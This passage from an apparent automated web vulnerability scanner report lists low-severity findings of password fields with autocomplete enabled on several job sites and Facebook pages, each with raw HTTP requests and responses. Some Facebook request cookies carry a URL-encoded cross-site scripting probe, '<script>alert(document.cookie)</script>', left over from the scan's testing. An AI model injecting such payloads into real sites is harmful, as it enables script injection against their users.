rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.43. http://www.employmentcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.employmentcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.employmentcrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.employmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ep2g7l3vs5a5pub16rrihs9jp3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103823

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.employmentcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.44. http://www.energycrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.energycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.energycrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.energycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:59 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i3h90hnvarkvvcfesqumj8vhf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117799

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.energycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.45. http://www.engineeringcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.engineeringcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.engineeringcrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.engineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u76d1au7ldsubj9jq17ge4lui3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 136413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.engineeringcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.46. http://www.entrylevelcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.entrylevelcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.entrylevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u5gd5nbnop8c3jphrctn63t6f2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:04 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149370

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.entrylevelcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.47. http://www.environmentalcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.environmentalcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.environmentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:07 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=dq6vrirkde3igauguqgj7gjfh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:07 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103899

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.environmentalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.48. http://www.environmentalsafetyhealthcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.environmentalsafetyhealthcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.environmentalsafetyhealthcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kinch90afsop9ot95vej0stu73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109299

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.environmentalsafetyhealthcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.49. http://www.ericmmartin.com/projects/simplemodal/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ericmmartin.com
Path:   /projects/simplemodal/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:09:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 20:01:28 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34881


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<div id="simplemodal-login-form" style="display:none">
   <form name="loginform" id="loginform" action="http://www.ericmmartin.com/wordpress/wp-login.php" method="post">
       <div class="title">
...[SNIP]...
<br />
           <input type="password" name="pwd" class="user_pass input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

11.50. http://www.erpcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.erpcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.erpcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:16 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f4lggi6e8n8h982dg6rfsp1522; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.erpcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.51. http://www.execcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.execcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.execcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:21 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=sedi04t58r2ut89pg242blpvl1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.execcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.52. http://www.facebook.com/BMWUSA

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BMWUSA

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /BMWUSA HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=EvrQb; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 19:51:54 GMT
Content-Length: 37193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

11.53. http://www.facebook.com/EmploymentXing

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /EmploymentXing

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /EmploymentXing HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Z_NLA; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FEmploymentXing; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FEmploymentXing; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:38 GMT
Content-Length: 21078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

11.54. http://www.facebook.com/pages/JD2B/298408284363

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/JD2B/298408284363

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /pages/JD2B/298408284363 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=jal5o; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:30 GMT
Content-Length: 56415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

11.55. http://www.facebook.com/piyush.v.bhatt

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /piyush.v.bhatt

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /piyush.v.bhatt HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=WABbM; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpiyush.v.bhatt; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpiyush.v.bhatt; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
